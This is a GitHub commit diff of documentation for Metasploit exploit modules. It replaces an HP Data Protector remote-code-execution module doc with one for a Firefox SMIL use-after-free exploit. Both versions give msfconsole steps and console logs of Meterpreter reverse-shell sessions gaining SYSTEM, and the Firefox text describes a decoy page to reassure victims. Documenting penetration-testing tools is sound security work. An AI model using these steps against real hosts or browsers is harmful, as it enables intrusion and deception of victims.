-
Notifications
You must be signed in to change notification settings - Fork 13.7k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
actually save the correct module doc
- Loading branch information
Showing
1 changed file
with
31 additions
and
58 deletions.
There are no files selected for viewing
89 changes: 31 additions & 58 deletions
89
documentation/modules/exploit/windows/browser/firefox_uaf_smil.md
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1,75 +1,48 @@ | ||
HP Data Protector is an automated backup and recovery software for single-server to enterprise | ||
environments. It provides cross-platform, online backup of data for Microsoft Windows, Unix, | ||
and Linux operating systems. | ||
|
||
While the server is using Encrypted Control Communication, HP Data Protector allows a remote | ||
attacker to gain access without authentication, and gain arbitrary code execution under the | ||
context of SYSTEM. | ||
Mozilla Firefox is a free, open-source web browser developed and maintained by the Mozilla Foundation. Multiple versions are affected by a use-after-free vulnerability, detailed by CVE 2016-9079, that can result in arbitrary remote code execution. | ||
|
||
|
||
## Vulnerable Application | ||
|
||
HP Data Protector versions 7, 8, and 9 are known to be affected. | ||
|
||
hp_dataprotector_encrypted_comms was specifically tested against version 9.0.0 on Windows 2008. | ||
|
||
## Verification Steps | ||
|
||
**Installing HP Data Protector** | ||
|
||
Before installing HP Data Protector, a Windows domain controller is needed. This exploit was tested | ||
against [a Windows Server 2008 R2 SP1 domain controller](https://www.youtube.com/watch?v=Buj9oEgbRt8). | ||
|
||
After setting up the domain controller, double-click on the HP Data Protector installer, and you | ||
should see this screen: | ||
|
||
![screen_1](https://cloud.githubusercontent.com/assets/13082457/15794665/99a86238-29e4-11e6-8ccd-0e09b0c8a693.png) | ||
The vulnerability is present in all releases of Mozilla Firefox prior to 50.0.2 | ||
|
||
Click on **Install Data Protector**. And then the installer should ask you which installation type: | ||
Firefox 38 through 41 were specifically chosen as targets for this module, though support for more releases is planned. | ||
|
||
![screen_2](https://cloud.githubusercontent.com/assets/13082457/15794701/de31d07e-29e4-11e6-9410-0b88abe77afe.png) | ||
## Usage | ||
|
||
Make sure to select **Cell Manager**, and click **Next**. Use all default settings. | ||
# UsePostHTML module option | ||
|
||
**Enabling Encrypted Communication** | ||
The module includes an option named UsePostHTML which is turned off by default. Setting this option to true will result in the module sending an HTML page to the target to be rendered after successful exploitation. This can be useful in convincing the target that they have arrived at a legitimate, benign website. If desired, please edit $datadirectory/exploits/firefox_smil_uaf/post.html to suit your needs. The included example file more than likely won't be suitable for your purposes. | ||
|
||
After the Setup Wizard is finished, we need to enable encrypted communication. First, open the | ||
Data Protector GUI: | ||
|
||
![screen_3](https://cloud.githubusercontent.com/assets/1170914/15845344/d3a84ee4-2c37-11e6-821d-fe8002c94686.png) | ||
|
||
Click on **Clients**, and the local client from the tree. You should see the **Connection** tab on the | ||
right, click on that. | ||
|
||
![screen_4](https://cloud.githubusercontent.com/assets/1170914/15845351/df9929f8-2c37-11e6-9d82-8c519c030a5f.png) | ||
|
||
Under the Connection tab, there should be an **Encrypted control communication** checkbox, make | ||
sure that is checked. And then click **Apply** | ||
|
||
**Using hp_dataprotector_encrypted_comms** | ||
|
||
After the encrypted communication is enabled, you are ready to use | ||
hp_dataprotector_encrypted_comms. Here is what you do: | ||
**Using firefox_smil_uaf** | ||
|
||
1. Start msfconsole | ||
2. Do: ```use exploit/windows/misc/hp_dataprotector_encrypted_comms``` | ||
3. Do: ```set RHOST [IP ADDRESS]``` | ||
2. Do: ```use exploit/windows/browser/firefox_smil_uaf``` | ||
3. Do: ```set payload [PREFERRED PAYLOAD] | ||
4. Do: ```set PAYLOAD [PAYLOAD NAME]``` | ||
5. Set other options as needed | ||
6. Do: ```exploit```, and you should receive a session like the following: | ||
5. Set payload options as needed | ||
6. Do: ```run```, and have a target browse to the generated URL | ||
7. Once a vulnerable target connects, you should receive a session like this: | ||
|
||
``` | ||
msf exploit(hp_dataprotector_encrypted_comms) > run | ||
[*] Started reverse TCP handler on 172.16.23.1:4444 | ||
[*] 172.16.23.173:5555 - Initiating connection | ||
[*] 172.16.23.173:5555 - Establishing encrypted channel | ||
[*] 172.16.23.173:5555 - Sending payload | ||
[*] 172.16.23.173:5555 - Waiting for payload execution (this can take up to 30 seconds or so) | ||
[*] Sending stage (957999 bytes) to 172.16.23.173 | ||
[*] Meterpreter session 1 opened (172.16.23.1:4444 -> 172.16.23.173:49304) at 2016-06-06 22:16:54 -0500 | ||
[*] Exploit running as background job. | ||
[*] Started reverse TCP handler on 192.168.79.132:6789 | ||
[*] Using URL: http://192.168.79.132:4567/lol | ||
[*] Server started. | ||
msf exploit(firefox_smil_uaf) > [*] 192.168.79.184 firefox_smil_uaf - Got request: /lol/ | ||
[*] 192.168.79.184 firefox_smil_uaf - From: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0 | ||
[*] 192.168.79.184 firefox_smil_uaf - Sending exploit HTML ... | ||
[*] 192.168.79.184 firefox_smil_uaf - Got request: /lol/worker.js | ||
[*] 192.168.79.184 firefox_smil_uaf - From: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0 | ||
[*] 192.168.79.184 firefox_smil_uaf - Sending worker thread Javascript ... | ||
[*] Sending stage (957487 bytes) to 192.168.79.184 | ||
[*] Meterpreter session 1 opened (192.168.79.132:6789 -> 192.168.79.184:52341) at 2017-01-20 11:25:38 -0600 | ||
[*] Session ID 1 (192.168.79.132:6789 -> 192.168.79.184:52341) processing InitialAutoRunScript 'migrate -f' | ||
[*] Running module against WIN-UTRINKNPT3D | ||
[*] Current server process: firefox.exe (1448) | ||
[*] Spawning notepad.exe process to migrate to | ||
[+] Migrating to 2572 | ||
[+] Successfully migrated to process 2572 | ||
meterpreter > getuid | ||
Server username: NT AUTHORITY\SYSTEM | ||
``` | ||
|